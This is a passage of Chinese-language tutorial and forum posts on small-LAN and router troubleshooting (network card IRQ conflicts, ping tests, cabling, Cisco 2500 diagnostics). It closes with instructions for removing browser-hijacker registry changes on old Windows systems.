   对硬件进行了检查和确认后，再检查驱动程序本身是否损坏，如果没有损坏，看看安装是否正确。如果这些可以判断正常，设备也没有冲突，就是不能连入网络，这时候可以将网络适配器在系统配置中删除，然后重新启动计算机，系统就会检测到新硬件的存在，然后自动寻找驱动程序再进行安装，笔者在安装Windows 98对等网过程中曾多次运用此方法解决了“上不了网”的问题。

    4、正确对网卡进行设置

   在确定网络介质没有问题，但还是不能接通的情况下，再返回网卡设置中。看看是否有设备资源冲突，有许多时候冲突也不是都有提示的。可能发生的设备资源冲突有：NE2000兼容网卡和COM2有冲突，都使用IRQ3，（Realtek RT8029）PCI Ethernet 网卡和显示卡都“喜欢”IRQ10。为了解决这种设备的冲突，我们可以按照如下操作步骤来进行设置：首先在设置窗口中将COM2屏蔽，并强行将网卡中断设为3；如果遇到PCI接口的网卡和显卡发生冲突时，我们可以采用不分配IRQ给显示卡的办法来解决，就是将CMOS中的 Assign IRQ for VGA 一项设置为“Disable”。

    5、禁用网卡的PnP功能

   有的网卡虽然支持PnP功能，但安装好后发现并不能好好地工作，甚至不能工作。为此，我们可以采用屏蔽网卡的PnP功能的方法来解决这一故障。要想禁用网卡的PnP功能，就必须运行网卡的设置程序(一般在驱动程序包中)。在启动设置程序后，进入设置菜单。禁用网卡的PnP功能，并将可以设置的IRQ一项修改为一个固定的值。保存该设置并退出设置程序，这样如果没有其他的设备占用该IRQ，可以保证不会出现IRQ冲突。另外，如果要安装Windows 95/98操作系统，必须保证操作系统不会将对应的中断类型作为具有PnP功能的IRQ进行处理，所以要在“CMOS”中将该中断的类型由“PCI/ISA PnP”修改为“Legacy ISA”。使用该方法可以解决大多数PnP网卡的设备冲突，但不一定对所有的PCI网卡都有效，因为有些网卡的设置程序根本就不提供禁用PnP功能选项。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


网络故障分层排查的高级技巧

《一键清理系统垃圾》

网络故障分层排查的高级技巧

    为了降低设计的复杂性，增强通用性和兼容性，计算机网络都设计成层次结构。这种分层体系使多种不同硬件系统和软件系统能够方便地连接到网络。管理员在分析和排查网络故障时，应充分利用网络这种分层的特点，快速准确地定位并排除故障。然而在实际故障排查过程中，这种分层方法往往被忽略，导致故障排查效率降低。

    两种逐层排查方式

    OSI的层次结构为管理员分析和排查故障提供了非常好的组织方式。由于各层相对独立，按层排查能够有效地发现和隔离故障，因而一般使用逐层分析和排查的方法。

    通常有两种逐层排查方式，一种是从低层开始排查，适用于物理网络不够成熟稳定的情况，如组建新的网络、重新调整网络线缆、增加新的网络设备；另一种是从高层开始排查，适用于物理网络相对成熟稳定的情况，如硬件设备没有变动。无论哪种方式，最终都能达到目标，只是解决问题的效率有所差别。

    根据具体情况选择排查方式

    具体采用哪种方式，可根据具体情况来选择。例如，遇到某客户端不能访问Web服务的情况，如果管理员首先去检查网络的连接线缆，就显得太悲观了，除非明确知道网络线路有所变动。比较好的选择是直接从应用层着手，可以这样来排查：首先检查客户端Web浏览器是否正确配置，可尝试使用浏览器访问另一个Web服务器；如果Web浏览器没有问题，可在Web服务器上测试Web服务器是否正常运行；如果Web服务器没有问题，再测试网络的连通性。即使是Web服务器问题，从底层开始逐层排查也能最终解决问题，只是花费的时间太多了。如果碰巧是线路问题，从高层开始逐层排查也要浪费时间。

    在实际应用中往往采用折衷的方式，凡是涉及到网络通信的应用出了问题，直接从位于中间的网络层开始排查，首先测试网络连通性，如果网络不能连通，再从物理层（测试线路）开始排查；如果网络能够连通，再从应用层（测试应用程序本身）开始排查。

    首先使用ping命令测试连通性。在TCP/IP网络中，排查网络问题的第一步常常是使用ping命令。如果能够成功地ping到远程主机，就排除了网络连接出现故障的可能性。即使是使用ping命令，也有一个逐步检测判断的步骤。

图1 网络示意图

    例如，假设有一个如图1所示的网络，这里要测试网络能否正常通信。通常从ping远程计算机开始（例中在主机A上ping主机B），成功说明系统和网络正常，失败说明主机离线或网络故障。失败后再ping同一子网的网关（例中为192.168.1.1）来确认主机A是否能够连接到路由器。失败后再ping环回地址127.0.0.1来确认TCP/IP协议软件是否有问题，如果有问题，需要重新安装TCP/IP协议软件。也可以采用另一种步骤，从ping环回地址127.0.0.1开始，失败说明TCP/IP协议软件安装有问题，如果成功再ping同一子网的网关，如果成功再ping其他网关（路由器）逐步排查网络各个环节，直到最后ping远程主机。只要成功地ping到远程主机，可以判断网络问题一般发生在更高层次。

    分层排查网络的措施

图2 分层排查网络的措施

    每个网络层次都有相应的检测排查工具和措施，各层的基本排查措施如图2所示。在最底层的物理层，专业人员往往采用专门的线缆测试仪，没有测试仪的可通过网络设备（网卡、交换机等）信号灯进行目测。数据链路层的问题不多，对于TCP/IP网络，可以使用简单的arp命令来检查MAC地址（物理地址）和IP地址之间的映射问题。网络层出现问题的可能性大一些，路由配置容易出现错误，可通过route命令来测试路由路径是否正确，也可使用ping命令来测试连通性。协议分析器（如微软提供的网络监视器）具有很强的检测和排查能力，能够分析链路层及其以上层次的数据通信，当然包括传输层。至于应用层，可使用应用程序本身进行测试。

    网管外包有好处

    有时候，公司部门IT员工的频繁更换会给公司带来很大的损失，这时最好的方法就是与外包商签订服务合约，让他们为自己提供网络管理服务。外包服务具有非常重要的意义。外包使公司能够得到它们所需的更好的技术人员和从长远来看最佳意义上的稳定性。这是因为多数用户不可能购买所有的工具，也不可能雇佣在各个领域都很有经验的员工。但是外包商能够提供这一切。

    对有些公司来说，IT外包服务有助于保持其稳定性。对另外一些公司来说，当公司雇佣的员工面临一项新技术提出的挑战时，外包能够降低开支、提高员工的适应性和降低风险等。但是在过去的若干年中，外包的好处不为人们所认识，外包策略也常常被人们所误解。

    在过去的一段时间，EDS、HP 和IBM等公司重新开发了外包市场，它们已与American Express，Procter & Gamble以及J.D. Edwards等签署了达万亿美元的合同，仅2002年金额在1亿到2.49亿之间的外包合同就超过全部合同的40%。而且，它们开始重视小合同的签署，这是外包种类发展的进步，它使更多的公司对外包服务开始另眼相看。大公司提供小服务，这使客户具有了更多的选择。

    去年，IBM开始为中小型客户提供产品和服务，今年第一季度它由此得到的收入占总收入的20%，即约43亿美元。HP与Compaq的合并使其可以提供更大范围的服务，因而它开始与Accenture，Computer Sciences，EDS 和IBM等公司相抗衡。

    除了为小型客户提供服务之外，产业专家认为外包还将在垂直市场获得生命力。根据IDC的调查，2002年银行、政府和媒体已经开始利用外包来作为它们主要的IT工具了。在过去的一年半中，很多公司开始外包小型垂直应用，如在线银行或HP服务器监控等特殊的管理任务等。


网络连接和测试

《一键清理系统垃圾》

网络连接和测试

    1． 连接计算机

    大家应该知道，网络的连接分为两个方面。一方面是软件配置，刚才我们已经顺利完成了。另一方面是硬件的安装。除了需要将网卡安装到计算机上之外。我们还要用网线通过网卡和Hub将计算机一台一台地连起来，组成网络。这里就涉及到网线的制作了。这可是个手艺活，具体的制作可以看看大众网络报的硬件版，要是自己搞不定的活，还可以去电脑城购买已经做好了的。有了做好的网线之后。下一步工作就是用网线连接计算机和Hub。网线一头接计算机上的网卡插槽，一头接在Hub上的插槽。如果Hub上的指示灯亮了，就表示计算机与Hub在物理上已经连通了。

?2．测试网络
    现在大部分的工作都做完了。你要做的事情只是测试网络是否已经设置成功。可以从三个方面来进行。

    (1） 测试网卡的设置是否正确

    在WindowsMe系统中单击“开始”按钮，在弹出的菜单中选择“程序”中的“MS－DOS方式”进入DOS控制台。输入：ping 192.168.0.1。

    ping是一个网络命令，在它后面的数字是你本机的IP地址。如果屏幕上出现下列信息，那就表明网卡设置没有错误。

    如果出现其他信息，就表明网卡的设置有问题，需要重新检查所有的参数。

    (2）检查网络是否通畅 　　 　　如果网卡设置没有错误，就应该测试网络是否通畅。在DOS提示符下输入：ping 192.168.0.2（Ping后面的数字是你本机以外的网络上的另一台计算机的IP地址）。

    如果屏幕上出现下列信息，表明网络已经通畅。

    如果出现其它信息，表明网络不通，你需要从本文开始处，分别检查网线、网关和网络设置。

    问题回答

    酷鱼：应该说组网不单需要理论上的知识，实践经验也相当重要。在组建网络的过程当中，你会遇到各种各样的疑难杂症。不幸的是教科书上一般都找不到解决方法。笔者也是从这样的困境中一步一步地捱过来的啊。为了让广大的新网虫不再犯和我一样的错误，现将联网中的经验之谈整理成文，做为新手组网时的参考。 　　问题1：安装不上网卡。

    答：网卡安装不上通常有以下几种原因：

    1．网卡太老或兼容性太差，与你的计算机不兼容，或你的计算机不能识别这一种类型的网卡。如果是这种原因，需要更换网卡。

    2．计算机上安装了很多其它类型的板卡，例如：声卡和内置Modem卡，它们的中断地址或DMA与网卡冲突。需要调整这些中断和地址，直到不冲突为止。

    3．计算机中有一些安装不正确的设备，或有“未知设备”一项，使系统不能检测网卡。这时应该删除“未知设备”中的所有项目，然后重新启动计算机。 　　问题2：Ping地址可以通，但ping域名不通。

    答：TCP/IP协议中的“DNS设置”不正确，请检查其中的配置。

    问题3：怎样才能让局域网连到intelnet?

    答：将局域网中某一台机器改为代理服务器。安装Sygate等代理服务器软件。然后将这台有代理服务的机器联入Internet（用Modem、ISDN、DDN专线均可）。其它计算机的网关设置为 代理服务器的IP地址。

    问题4：如何让modem自动接听来电？

    答：用AT指令：ATS1=n, n<>0

    问题5：有些Hub上的有BNC口（和一般的RJ45口不同），它应该怎么用？

    答：有BNC口的Hub应该是10M的Hub吧。由于使用BNC口的细缆实际传输速度要比用RJ45口的双绞线（10M）快一点。所以通常用来作Hub之间的连接。当然直接用同轴电缆与微机上网卡的 BNC 口相连也未尝不可。

    问题6：现有一个用同轴电缆组建的局域网（各机器都含有一个BNC口和一个RJ45口.），如何将一台只有RJ45口网卡的电脑连上？

    答：必须使用Hub，将这台电脑通过Hub连接到局域网中。

    问题7：100M网络的网线排法是否不同？应该怎样排才正确？

    答：100M网络的网线需要特殊的绕接才能减少窜扰。100M网线的排法为白橙、橙、白绿、蓝、白蓝、绿、白褐、褐。

    问题8：局域网我也会建了，可是只把两台计算机连起来时，我却犯了难。怎样才能不使用Hub也能双机互联呢？

    答：改变一下双绞线的排法即可。一边按照你的习惯来排，另一边将线头的1和3、2和6互换即可。


小型局域网故障诊断必读

《一键清理系统垃圾》

小型局域网故障诊断必读

1添加网关192.168.0.1　2DNS 202.97.244.68 第二个要看你机器原来的DNS是多少啦 注：DNS有两个

添加IP192.168.0.？　 看自己的机器是怎么分配　　　　要看网落通不通　请在开始菜单的运行里打个命令
PING（空格）192.168.0.1（空格）-T　　飞雪下面的知识你要掌握一下！！！

首先小型局域网故障诊断必读

对于小型局域网的管理员来说，在网络的维护过程中，麻烦不断。 怎么尽可能地减少网络的故障，以及出现常见的故障如何排除，是每一个管理员都希望做到的。现将小型局域网经常出现的故障加以解析。

目前的网络大多数都围绕着Intranet/Internet体系，或者是单独一个局域网。我主要针对目前流行的小型网吧的计算机网络体系为例，来说一下常见的故障现象及排除方法。

1、网络不通。这是最常见的问题，解决问题的基本原则是先软后硬，先从软件方面去考虑，对于目前流行的Windows网络，可以先安装好TCP/IP协议，指定每台计算机的IP地址，使用Ping命令，看其它的计算机是否能够Ping的通，如果不通，则证明网络连接有问题，如果通但是有时候丢失数据包的话，证明网络传输有阻塞，或者说是网络设备接触不大好，需要检查网络设备。

2、RJ45接口是否制作好，RJ45是10BASE-T网络标准中接口形式，现在被广泛使用。其内部有8个线槽，线槽含义遵循EIA/TIA568国际标准，在10BASE-T网络中1、2线为发送线，3、6线为接收线。在双机进行连接的时候，其中的1,3,2,6线需要对调。否则也会造成网络的不通。另外，需要检查HUB或者交换机的接头是否有问题，如果某个接口有问题，可以换一个接口来测试。

3、网卡的问题，目前大多数网吧使用的都是PCI的自适应网卡，或者使用100M的网卡。网卡的问题不太明显，所以在测试的时候最好是先测试网线，再测试网卡，如果有条件的话，可以使用测线仪或者万用表进行测试。首先要查看网卡是否正常安装了驱动程序，如果没有安装驱动程序，或者驱动程序有问题，硬件有冲突，需要查看与什么硬件冲突，然后修改对应的中断号和I/O地址来避免冲突，有些网卡还需要在CMOS中进行设置。即使网卡在系统属性中的调备管理器中显示工作正常，也不能掉以轻心。

我曾经遇见过以下几个现象：ISA Tp-Link网卡，在安装好它的驱动程序以后，如果一连上网线，其它计算机都无法正常连接到网络，把它去掉以后，其它计算机可以正常连网；另一块网卡是安装好它的驱动以后，在系统属性中的设备管理器中也显示正常，但是无论换任何网线都无法正常连网，换一块网卡问题解决，这些问题都是网卡的问题。

4、病毒，最近互联网上出现许多比较厉害的新病毒，例如红色代码，蓝色代码，尼姆达等病毒。某些病毒除了使计算机运行变慢，还可以阻塞网络，造成网络塞车。对付这些新病毒，大多数病毒厂商，例如瑞星，Kv3000在其主页上都有对付的办法，在这里一定要注意，不要按照平常的杀毒办法杀毒，必须对杀毒软件进行定时的升级。某些病毒直接查杀无法杀干净。

    网络诊断是一门综合性技术，涉及网络技术的方方面面。为方便下面的讨论，首先简单回顾一下网络和路由器的基本概念。

    1．计算机网络是由计算机集合加通信设施组成的系统，即利用各种通信手段，把地理上分散的计算机连在一起，达到相互通信而且共享软件、硬件和数据等资源的系统。计算机网络按其计算机分布范围通常被分为局域网和广域网。局域网覆盖地理范围较小，一般在数米到数十公里之间。广域网覆盖地理范围较大，如校园、城市之间、乃至全球。计算机网络的发展，导致网络之间各种形式的连接。采用统一协议实现不同网络的互连，使互联网络很容易得到扩展。因特网就是用这种方式完成网络之间联结的网络。因特网采用TCP/IP协议作为通信协议，将世界范围内计算机网络连接在一起，成为当今世界最大的和最流行的国际性网络。

    2.为了完成计算机间的通信，把每部计算机互连的功能划分成定义明确的层次，规定了同层进程通信的协议及相邻层之间的接口和服务，将这些层、同层进程通信的协议及相邻层之间的接口统称为网络体系结构。国际标准化组织（ISO）提出的开放系统互连参考模型（OSI）是当代计算机网络技术体系的核心。该模型将网络功能划分为7个层次：物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。

    3.TCP/IP即传输控制协议和网间互联协议是一组网络协议。TCP/IP起源于美国ARPANET网，发展至今已成为因特网使用的标准通信协议。使用TCP/IP能够使采用不同操作系统的计算机以有序的方式交换数据。

    4.路由器是一种网络设备，是用于网络连接、执行路由选择任务的专用计算机。路由器工作于网络层，对信包转发，并具有过滤功能。路由器能够将使用不同技术的两个网络互连起来，能够在多种类型的网络之间（局域网或广域网）建立网络连接。它将处在七层模型中的网络层的信息，根据最快、最直接的路由原理从一个网络的网络层传输到另一个网络的网络层，以达到最佳路由选择。同时在内部使用高档微处理器，用高速的内部总线连接适合各种网络协议的接口卡。并具有多种网管功能，能监视与路由器相连接的一些网络设备和它们的配置运行情况。

    5.CISCO路由器是目前网络建设中使用最多的一种路由器，有多种档次、多种系列，目前常用的当属2500系列，本文以2500系列为例讨论。2500系列路由器是固定接口的多协议路由器，支持CISCOIOS全部功能。根据特定的协议环境分为以下四种类型：固定配置的路由器（2501）、带HUB口的路由器（2507）、摸块化的路由器（2514）和访问服务器（2511）。它们结构简单、操作方便、易于配置和管理，是一种用于小规模局域网和广域网网络层中继的路由设备。

    6．CISCOIOS是CISCO所特有的互连网操作系统，所有的CISCO产品都运行IOS，IOS将它们无缝连接在一起协同工作。给用户提供一个可支持任意硬件界面、任意链路层、网络层协议的可扩展的开放型网络。IOS支持众多的协议，包括各种网络通信协议和路由协议等。CISCOIOS已成为工业界网际网互联的事实标准。
    CISCOIOS提供几种不同的操作模式，每一种模式提供一组相关的命令集、不同的操作权限和操作功能。基于安全目的，CISCO用户界面中有两级访问权限：用户级和特权级。
    第一级访问允许查看路由状态，叫做用户EXEC模式，又称为查看模式；
    第二级访问允许查看路由器配置、修改配置和运行调试命令，叫做特权EXEC模式，又称为配置模式。
    在特权级中，按不同的配置内容，可进入不同的配置模式，如全球配置模式、接口配置模式、线配置模式等。

    网络故障诊断概述

    网络故障诊断应该实现三方面的目的：
    确定网络的故障点，恢复网络的正常运行；
    发现网络规划和配置中欠佳之处，改善和优化网络的性能；
    观察网络的运行状况，及时预测网络通信质量。
    网络故障诊断以网络原理、网络配置和网络运行的知识为基础。从故障现象出发，以网络诊断工具为手段获取诊断信息，确定网络故障点，查找问题的根源，排除故障，恢复网络正常运行。网络故障通常有以下几种可能：物理层中物理设备相互连接失败或者硬件及线路本身的问题；数据链路层的网络设备的接口配置问题；网络层网络协议配置或操作错误；传输层的设备性能或通信拥塞问题；上三层CISCOIOS或网络应用程序错误。诊断网络故障的过程应该沿着OSI七层模型从物理层开始向上进行。首先检查物理层，然后检查数据链路层，以此类推，设法确定通信失败的故障点，直到系统通信正常为止。
    网络诊断可以使用包括局域网或广域网分析仪在内的多种工具：路由器诊断命令；网络管理工具和其它故障诊断工具。CISCO提供的工具足以胜任排除绝大多数网络故障。查看路由表，是解决网络故障开始的好地方。ICMP的ping、trace命令和Cisco的show命令、debug命令是获取故障诊断有用信息的网络工具。我们通常使用一个或多个命令收集相应的信息，在给定情况下，确定使用什么命令获取所需要的信息。譬如，通过IP协议来测定设备是否可达到的常用方法是使用ping命令。ping从源点向目标发出ICMP信息包，如果成功的话，返回的ping信息包就证实从源点到目标之间所有物理层、数据链路层和网罗层的功能都运行正常。如何在互联网络运行后了解它的信息，了解网络是否正常运行，监视和了解网络在正常条件下运行细节，了解出现故障的情况。监视那些内容呢？利用showinterface命令可以非常容易地获得待检查的每个接口的信息。另外showbuffer命令提供定期显示缓冲区大小、用途及使用状况等。Showproc命令和showprocmem命令可用于跟踪处理器和内存的使用情况，可以定期收集这些数据，在故障出现时，用于诊断参考。网络故障以某种症状表现出来，故障症状包括一般性的（象用户不能接入某个服务器）和较特殊的（如路由器不在路由表中）。对每一个症状使用特定的故障诊断工具和方法都能查找出一个或多个故障原因。
    一般故障排除模式如下：第一步，当分析网络故障时，首先要清楚故障现象。应该详细说明故障的症侯和潜在的原因。为此，要确定故障的具体现象，然后确定造成这种故障现象的原因的类型。例如，主机不响应客户请求服务。可能的故障原因是主机配置问题、接口卡故障或路由器配置命令丢失等。第二步，收集需要的用于帮助隔离可能故障原因的信息。向用户、网络管理员、管理者和其他关键人物提一些和故障有关的问题。广泛的从网络管理系统、协议分析跟踪、路由器诊断命令的输出报告或软件说明书中收集有用的信息。第三步，根据收集到的情况考虑可能的故障原因。可以根据有关情况排除某些故障原因。例如，根据某些资料可以排除硬件故障，把注意力放软件原因上。对于任何机会都应该设法减少可能的故障原因，以至于尽快的策划出有效的故障诊断计划。第四步，根据最后的可能的故障原因，建立一个诊断计划。开始仅用一个最可能的故障原因进行诊断活动，这样可以容易恢复到故障的原始状态。如果一次同时考虑一个以上的故障原因，试图返回故障原始状态就困难的多了。第五步，执行诊断计划，认真做好每一步测试和观察，直到故障症状消失。第六步，每改变一个参数都要确认其结果。分析结果确定问题是否解决，如果没有解决，继续下去，直到解决。

    网络故障分层诊断技术

    1．物理层及其诊断物理层是OSI分层结构体系中最基础的一层，它建立在通信媒体的基础上，实现系统和通信媒体的物理接口，为数据链路实体之间进行透明传输，为建立、保持和拆除计算机和网络之间的物理连接提供服务。
    物理层的故障主要表现在设备的物理连接方式是否恰当；连接电缆是否正确；MODEM、CSU/DSU等设备的配置及操作是否正确。确定路由器端口物理连接是否完好的最佳方法是使用showinterface命令，检查每个端口的状态，解释屏幕输出信息，查看端口状态、协议建立状态和EIA状态。

    2．数据链路层及其诊断数据链路层的主要任务是使网络层无须了解物理层的特征而获得可靠的传输。数据链路层为通过链路层的数据进行打包和解包、差错检测和一定的校正能力，并协调共享介质。在数据链路层交换数据之前，协议关注的是形成帧和同步设备。查找和排除数据链路层的故障，需要查看路由器的配置，检查连接端口的共享同一数据链路层的封装情况。每对接口要和与其通信的其他设备有相同的封装。通过查看路由器的配置检查其封装，或者使用show命令查看相应接口的封装情况。

    3．网络层及其诊断网络层提供建立、保持和释放网络层连接的手段，包括路由选择、流量控制、传输确认、中断、差错及故障恢复等。排除网络层故障的基本方法是：沿着从源到目标的路径，查看路由器路由表，同时检查路由器接口的IP地址。如果路由没有在路由表中出现，应该通过检查来确定是否已经输入适当的静态路由、默认路由或者动态路由。然后手工配置一些丢失的路由，或者排除一些动态路由选择过程的故障，包括RIP或者IGRP路由协议出现的故障。例如，对于IGRP路由选择信息只在同一自治系统号（AS）的系统之间交换数据，查看路由器配置的自治系统号的匹配情况。

    路由器接口故障排除

    1．串口故障排除串口出现连通性问题时，为了排除串口故障，一般是从showinterfaceserial命令开始，分析它的屏幕输出报告内容，找出问题之所在。串口报告的开始提供了该接口状态和线路协议状态。
    接口和线路协议的可能组合有以下几种：
    1）串口运行、线路协议运行，这是完全的工作条件。该串口和线路协议已经初始化，并正在交换协议的存活信息。
    2）串口运行、线路协议关闭，这个显示说明路由器与提供载波检测信号的设备连接，表明载波信号出现在本地和远程的调制解调器之间，但没有正确交换连接两端的协议存活信息。可能的故障发生在路由器配置问题、调制解调器操作问题、租用线路干扰或远程路由器故障，数字式调制解调器的时钟问题，通过链路连接的两个串口不在同一子网上，都会出现这个报告。
    3)串口和线路协议都关闭，可能是电信部门的线路故障、电缆故障或者是调制解调器故障。
    4）串口管理性关闭和线路协议关闭，这种情况是在接口配置中输入了shutdown命令。通过输入noshutdown命令，打开管理性关闭。接口和线路协议都运行的状况下，虽然串口链路的基本通信建立起来了，但仍然可能由于信息包丢失和信息包错误时会出现许多潜在的故障问题。正常通信时接口输入或输出信息包不应该丢失，或者丢失的量非常小，而且不会增加。如果信息包丢失有规律性增加，表明通过该接口传输的通信量超过接口所能处理的通信量。解决的办法是增加线路容量。查找其他原因发生的信息包丢失，查看showinterfaceserial命令的输出报告中的输入输出保持队列的状态。当发现保持队列中信息包数量达到了信息的最大允许值，可以增加保持队列设置的大小。

    2．以太接口故障排除
    以太接口的典型故障问题是：带宽的过分利用；碰撞冲突次数频繁；使用不兼容的幀类型。使用showinterfaceethernet命令可以查看该接口的吞吐量、碰橦冲突、信息包丢失、和幀类型的有关内容等。
    1）通过查看接口的吞吐量可以检测网络的利用。如果网络广播信息包的百分比很高，网络性能开始下降。光纤网转换到以太网段的信息包可能会淹没以太口。互联网发生这种情况可以采用优化接口的措施，即在以太接口使用noiproutecache命令，禁用快速转换，并且调整缓冲区和保持队列。
    2）两个接口试图同时传输信息包到以太电缆上时，将发生碰橦。以太网要求冲突次数很少，不同的网络要求是不同的，一般情况发现冲突每秒有3、5次就应该查找冲突的原因了。碰橦冲突产生拥塞，碰橦冲突的原因通常是由于敷设的电缆过长、过分利用、或者“聋”节点。以太网络在物理设计和敷设电缆系统管理方面应有所考虑，超规范敷设电缆可能引起更多的冲突发生。
    3）如果接口和线路协议报告运行状态，并且节点的物理连接都完好，可是不能通信。引起问题的原因也可能是两个节点使用了不兼容的幀类型。解决问题的办法是重新配置使用相同幀类型。如果要求使用不同幀类型的同一网络的两个设备互相通信，可以在路由器接口使用子接口，并为每个子接口指定不同的封装类型。

    3．异步通信口故障排除互连网络的运行中，异步通信口的任务是为用户提供可靠服务，但又是故障多发部位。主要的问题是，在通过异步链路传输基于LAN通信量时，将丢失的信息包的量降止最少。
    异步通信口故障一般的外部因素是：拨号链路性能低劣；电话网交换机的连接质量问题；调制解调器的设置。检查链路两端使用的调制解调器：连接到远程PC机端口调制解调器的问题不太多，因为每次生成新的拨号时通常都初始化调制解调器，利用大多数通信程序都能在发出拨号命令之前发送适当的设置字符串；连接路由器端口的问题较多，这个调制解调器通常等待来自远程调制解调器的连接，连接之前，并不接收设置字符串。如果调制解调器丢失了它的设置，应采用一种方法来初始化远程调制解调器。简单的办法是使用可通过前面板配置的调制解调器，另一种方法是将调制解调器接到路由器的异步接口，建立反向telnet,发送设置命令配置调制解调器。showinterfaceasync命令、showline命令是诊断异步通信口故障使用最多的工具。showinterfaceasync命令输出报告中，接口状态报告关闭的唯一的情况是接口没有设置封装类型。线路协议状态显示与串口线路协议显示相同。showline命令显示接口接收和传输速度设置以及EIA状态显示。
    showline命令可以认为是接口命令（showinterfaceasync）的扩展。showline命令输出的EIA信号及网络状态：noCTSnoDSRDTRRTS：调制解调器未与异步接口连接。CTSnoDSRDTRRTS：调制解调器与异步接口连接正常，但未连接远程调制解调器。CTSDSRDTRRTS：远程调制解调器拨号进入并建立连接。确定异步通信口故障一般可用下列步骤：检查电缆线路质量；检查调制解调器的参数设置；检查调制解调器的连接速度；检查rxspeed和txspeed是否与调制解调器的配置匹配；通过showinterfaceasync命令和showline命令查看端口的通信状况；从showline命令的报告检查EIA状态显示；检查接口封装；检查信息包丢失及缓冲区丢失情况。
    网络发生故障是不可避免的。网络建成运行后，网络故障诊断是网络管理的重要技术工作。搞好网络的运行管理和故障诊断工作，提高故障诊断水平需要注意以下几方面的问题：认真学习有关网络技术理论；清楚网络的结构设计，包括网络拓朴、设备连接、系统参数设置及软件使用；了解网络正常运行状况、注意收集网络正常运行时的各种状态和报告输出参数；熟悉常用的诊断工具，准确的描述故障现象。


网页恶意代码的手工处理

《一键清理系统垃圾》

网页恶意代码的手工处理

[color=Red]1. 清除每次开机时自动弹出的网页[/color]

[color=Blue]记住地址栏里出现的网址，然后打开注册表编辑器（方法是在点击“开始”菜单，之后点击“运行”，在运行框中输入regedit命令进入注册表编辑器），分别定位到：

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run和
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce

下，看看在该子项下是否有一个以这个网址为值的值项，如果有的话，就将其删除，之后重新启动计算机。这样在下一次开机的时候就不再会有网页弹出来了。

    不过网页恶意代码的编写者有时也是非常的狡猾，他会在注册表的不同键值中多处设有这个值项，这样上面提的方法也未必能完全解决问题。遇到这种情况，你可以在注册表编辑器的选项菜单里选择“编辑”→“查找”，在“查找”对话框内输入开机时自动打开的网址，然后点击“查找下一个”，将查找到的值项删除。另外，如果你是使用Windows 98的用户，可在“开始”菜单中的“运行”对话框内输入“msconfig”，点击确定，打开“系统配置实用程序”并打开“启动”选项卡，检查其中是否有非常可疑的启动项，如果有的话请将其禁用(在程序前的打上勾)，然后重启机器就可以了。如果你所使用的是Windows NT/2000的用户，可以把Windows 98下的“系统配置实用程序”复制过来并运行进行查找清除。[/color]

[color=Red]2. IE标题栏被修改[/color]

[color=Blue]在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。

    具体说来受到更改的注册表项目为：

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title

    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title[/color]
[color=Green]解决办法：[/color]

[color=Brown]1). 在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    2). 展开注册表到

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Window Title” ，将该串值删除即可，或将Window Title的键值改为“IE浏览器”等你喜欢的名字；

    3). 同理，展开注册表到

  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

    然后按2)中所述方法处理。

    4).退出注册表编辑器，重新启动计算机，运行IE，你会发现困扰你的问题被解决了

[续][/color]

[color=Red]3. IE默认连接首页被修改[/color]

[color=Blue]IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式，这是最常见的篡改手段，受害者众多。

    受到更改的注册表项目为：

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

    通过修改“Start Page”的键值，来达到修改浏览者IE默认连接首页的目的，如浏览“万花谷”就会将你的IE默认连接首页修改为“[url]http://on888.home.chinaren.com[/url] ”，即便是出于给自己的主页做广告的目的，也显得太霸道了一些，这也是这类网页惹人厌恶的原因。[/color]

[color=Red]解决办法：[/color]
[color=Brown]1). 在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    2). 展开注册表到
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Start Page”双击 ，将Start Page的键值改为“about:blank”即可；

    3). 同理，展开注册表到
   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    在右半部分窗口中找到串值“Start Page”，然后按2)中所述方法处理。

    4). 退出注册表编辑器，重新启动计算机，一切OK了！

    特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址啦，十分的难缠。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。

[/color]

[color=Red]4. 系统启动时弹出对话框[/color]

[color=Blue]受到更改的注册表项目为：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”，其中“LegalNoticeCaption”是提示框的标题，“LegalNoticeText”是提示框的文本内容。由于它们的存在，就使得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息！

    解决办法：

    打开注册表编辑器，找到

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    这一个主键，然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串，删除这两个字符串就可以解决在登陆时出现提示框的现象了。[/color]

[color=Red]5.　修复被锁定的注册表[/color]
[color=Blue]注册表被锁定这一招是比较恶毒的，它使普遍用户即使会简单修改注册表使其恢复的条件下，困难又多了一层。症状是在开始菜单中点击“运行”，在运行框中输入regedit命令时，注册表不能够使用，并发现系统提示你没有权限运行该程序，然后让你联系系统管理员。

    这是由于注册表编辑器：
